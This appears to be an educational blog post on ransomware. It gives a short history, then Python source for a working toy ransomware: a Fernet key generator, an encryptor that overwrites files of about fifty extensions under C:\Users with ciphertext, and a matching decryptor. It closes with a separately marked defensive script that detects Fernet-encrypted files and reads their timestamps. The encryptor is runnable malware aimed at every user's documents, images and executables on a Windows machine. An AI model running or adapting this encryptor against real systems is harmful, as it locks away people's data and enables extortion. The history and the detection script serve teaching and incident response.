DISCLAIMER:
THE CONTENT OF THIS POST IS INTENDED FOR EDUCATIONAL PURPOSES ONLY. THE INFORMATION PROVIDED IS DESIGNED TO ENHANCE UNDERSTANDING AND AWARENESS ABOUT RANSOMWARE AND THEIR IMPLICATIONS IN CYBERSECURITY. IT IS NOT MEANT TO ENCOURAGE UNAUTHORIZED OR ILLEGAL ACTIVITIES. READERS ARE ADVISED TO USE THE KNOWLEDGE GAINED FROM THIS POST RESPONSIBLY AND ETHICALLY, ADHERING TO ALL APPLICABLE LAWS AND REGULATIONS REGARDING PRIVACY AND DATA PROTECTION.
In the ever-evolving landscape of cybersecurity threats, ransomware stands out as a particularly insidious type of malware. It’s a digital extortion tool that locks away the victim’s data, demanding a ransom for its release. The concept is simple yet devastating: your files are encrypted by the attacker, and without the decryption key, they’re as good as gone. To add insult to injury, the ransom usually comes in the form of hard-to-trace cryptocurrencies, making it a nightmare to deal with both technically and legally.
The origins of ransomware can be traced back to the late 1980s, with the first documented case being the AIDS Trojan. This early example set the stage for what would become a global threat, evolving rapidly with the internet’s expansion. By the mid-2010s, ransomware had become a common and feared weapon in the cybercriminal arsenal, with notorious variants like CryptoLocker and WannaCry causing widespread havoc.
But ransomware isn’t just about locking files anymore. The tactics have grown more sophisticated, with double and even triple extortion techniques. Attackers don’t just encrypt data; they steal it and threaten to leak sensitive information if their demands aren’t met. This evolution has raised the stakes significantly, making it a top concern for individuals and organizations alike.
Despite the grim picture, there’s a silver lining. As awareness of ransomware grows, so do the efforts to combat it. Cybersecurity professionals are developing more robust defense mechanisms, and many victims are now able to avoid paying ransoms by having secure backups and employing effective detection tools.
The history of ransomware is a testament to the cat-and-mouse game between cybercriminals and defenders. It’s a reminder that in the digital age, vigilance is key, and staying informed is our best defense. For a deeper dive into the technical workings and prevention strategies, resources like IBM’s guide on ransomware offer valuable insights.
I have been playing around with making some ransomware, nothing like cybercriminals make, but just a little example and something I could get working. Normally they may have it travel through a network and do some considerable damage, stealing credentials and locking machines. Here it just locks some files in a directory, but you get a sense of how it does what it does.
I first start with creating a key for the encryption and decryption programs. I will use Python and import Fernet. Fernet guarantees that a message encrypted using it cannot be manipulated or read without the key. Fernet is an implementation of symmetric authenticated cryptography.
from cryptography.fernet import Fernet

# Generate a key
def generate_key():
    return Fernet.generate_key()

# Save the key to a file
def save_key(key, file_path):
    with open(file_path, "wb") as key_file:
        key_file.write(key)

# Generate a key
key = generate_key()

# Save the key to a file
save_key(key, "key.key")
The key should be located in the directory that you run the program in.
import os
from cryptography.fernet import Fernet

# Load the key from the file (closed properly via a context manager)
def load_key():
    with open("key.key", "rb") as key_file:
        return key_file.read()

# Create a cipher suite
cipher_suite = Fernet(load_key())

# Define a function to encrypt a file
def encrypt_file(file_path):
    # Read the file
    with open(file_path, 'rb') as file:
        file_data = file.read()
    # Encrypt the file
    encrypted_data = cipher_suite.encrypt(file_data)
    # Overwrite the original file with the encrypted data
    with open(file_path, 'wb') as file:
        file.write(encrypted_data)

# Define a function to encrypt all files in a directory
def encrypt_all_files(directory_path, extensions):
    # Iterate over all items in the directory
    for root, dirs, files in os.walk(directory_path):
        for name in files:
            # Construct the full path
            path = os.path.join(root, name)
            # Skip hidden files, the 'AppData' directory, and 'ntuser' files.
            # The hidden/ntuser checks are on the file name: a full path from
            # os.walk never starts with '.' or 'ntuser', so the original checks never matched.
            if name.startswith('.') or 'AppData' in path or name.lower().startswith('ntuser'):
                continue
            # If it's a file, encrypt it
            if os.path.isfile(path):
                # Check if the file has one of the desired extensions
                if any(path.endswith(ext) for ext in extensions):
                    try:
                        encrypt_file(path)
                    except Exception as e:
                        print(f"Skipping file due to error: {path}")
                        print(f"Error: {str(e)}")

# List of extensions
extensions = [
    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
    ".jpg", ".jpeg", ".png", ".gif", ".bmp", ".svg", ".webp",
    ".mp3", ".wav", ".ogg", ".flac", ".aac",
    ".mp4", ".avi", ".mov", ".flv", ".mkv", ".wmv",
    ".zip", ".rar", ".tar", ".gz", ".7z",
    ".py", ".js", ".html", ".css", ".php", ".java", ".c", ".cpp", ".h", ".cs",
    ".exe", ".dll", ".bat", ".sh", ".msi", ".sys", ".bin", ".udp"
]

# Call the function to encrypt all files in a directory
encrypt_all_files("C:\\Users", extensions)
This is the encryption program. I call on it to lock all files in the Users folder on Windows 10. While building the code I added in the skip-hidden-directory check; it probably doesn't need to be there now, but I have left it in. Since the rise of AI I do use it while writing code and it has helped a lot; it would take me longer to write if I didn't use it.
import os
from cryptography.fernet import Fernet

# Load the key from the file (closed properly via a context manager)
def load_key():
    with open("key.key", "rb") as key_file:
        return key_file.read()

# Create a cipher suite
cipher_suite = Fernet(load_key())

# Define a function to decrypt a file
def decrypt_file(file_path):
    try:
        # Read the file
        with open(file_path, 'rb') as file:
            encrypted_data = file.read()
        # Decrypt the file (raises InvalidToken if the data was not encrypted with this key)
        decrypted_data = cipher_suite.decrypt(encrypted_data)
        # Overwrite the original file with the decrypted data
        with open(file_path, 'wb') as file:
            file.write(decrypted_data)
    except Exception as e:
        print(f"Skipping file due to error: {file_path}")
        print(f"Error: {str(e)}")

# Define a function to decrypt all files in a directory
def decrypt_all_files(directory_path, extensions):
    # Iterate over all items in the directory
    for root, dirs, files in os.walk(directory_path):
        for name in files:
            # Construct the full path
            path = os.path.join(root, name)
            # Skip hidden files, the 'AppData' directory, and 'ntuser' files
            # (same name-based checks as the encryptor, so both walk the same set of files)
            if name.startswith('.') or 'AppData' in path or name.lower().startswith('ntuser'):
                continue
            # If it's a file, decrypt it
            if os.path.isfile(path):
                # Check if the file has one of the desired extensions
                if any(path.endswith(ext) for ext in extensions):
                    decrypt_file(path)

# List of extensions (must match the encryptor's list exactly, otherwise
# files it encrypted are never decrypted; the last entry was "udp" instead of ".udp")
extensions = [
    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
    ".jpg", ".jpeg", ".png", ".gif", ".bmp", ".svg", ".webp",
    ".mp3", ".wav", ".ogg", ".flac", ".aac",
    ".mp4", ".avi", ".mov", ".flv", ".mkv", ".wmv",
    ".zip", ".rar", ".tar", ".gz", ".7z",
    ".py", ".js", ".html", ".css", ".php", ".java", ".c", ".cpp", ".h", ".cs",
    ".exe", ".dll", ".bat", ".sh", ".msi", ".sys", ".bin", ".udp"
]

# Call the function to decrypt all files in a directory
decrypt_all_files("C:\\Users", extensions)
Here is the decrypt version. If you are going to practice with any of this code, make sure you keep a backup of the decryption program, the key and any files you don't want to lose. Make sure you run it in a safe environment.
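One thing the two programs above make visible from the defender's side is that Fernet output is easy to recognise: every token is urlsafe base64 of a fixed 0x80 version byte, a cleartext timestamp, an IV, the ciphertext and an HMAC, so each encrypted file starts with the text "gAAAAA" and carries the time it was encrypted. The following is an added example (not code from the post) of an incident-response triage script that walks a directory, flags files that are well-formed Fernet tokens and recovers the encryption timestamp from each without needing key.key; the function names, the sample files and the throwaway key in demo() are constructed for illustration.

```python
import base64
import os
import struct
import tempfile
from cryptography.fernet import Fernet

# Fernet token = urlsafe base64 of: version 0x80 | timestamp (8 bytes, big-endian
# unix seconds) | IV (16) | AES-128-CBC ciphertext (multiple of 16) | HMAC (32).
# The fixed version byte means every token's text starts with "gAAAAA".
FERNET_PREFIX = b"gAAAAA"
FRAMING_LEN = 1 + 8 + 16 + 32  # bytes surrounding the ciphertext
def fernet_token_timestamp(data):
    """Unix timestamp embedded in a Fernet token, or None if not a well-formed
    token. No key needed: the timestamp is authenticated but not encrypted."""
    if not data.startswith(FERNET_PREFIX):
        return None
    try:
        raw = base64.urlsafe_b64decode(data)
    except ValueError:  # binascii.Error (bad padding) is a ValueError subclass
        return None
    if len(raw) < FRAMING_LEN + 16 or (len(raw) - FRAMING_LEN) % 16:
        return None
    return struct.unpack(">Q", raw[1:9])[0]

def triage_directory(directory):
    """Map each Fernet-encrypted file under directory to its token timestamp."""
    hits = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue
            ts = fernet_token_timestamp(data)
            if ts is not None:
                hits[path] = ts
    return hits

def demo():
    """Constructed scenario: three temp files, two encrypted with a throwaway
    key, then triaged without the key. Returns {filename: timestamp}."""
    cipher = Fernet(Fernet.generate_key())
    samples = {"a.txt": b"hello", "b.docx": b"x" * 100, "c.txt": b"untouched"}
    with tempfile.TemporaryDirectory() as d:
        for name, body in samples.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(body if name == "c.txt" else cipher.encrypt(body))
        return {os.path.basename(p): ts for p, ts in triage_directory(d).items()}
```

Because the timestamp is only authenticated, not encrypted, a responder can rebuild the order in which files were touched from the tokens alone, and a check for the "gAAAAA" prefix on file contents is a cheap scope-assessment signal for this particular toy.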
As we continue to rely more on digital infrastructures, understanding threats like ransomware becomes crucial. It’s not just about protecting data; it’s about safeguarding our way of life in the interconnected world of today and tomorrow. So, let’s keep the conversation going, share knowledge, and build a safer digital future for everyone.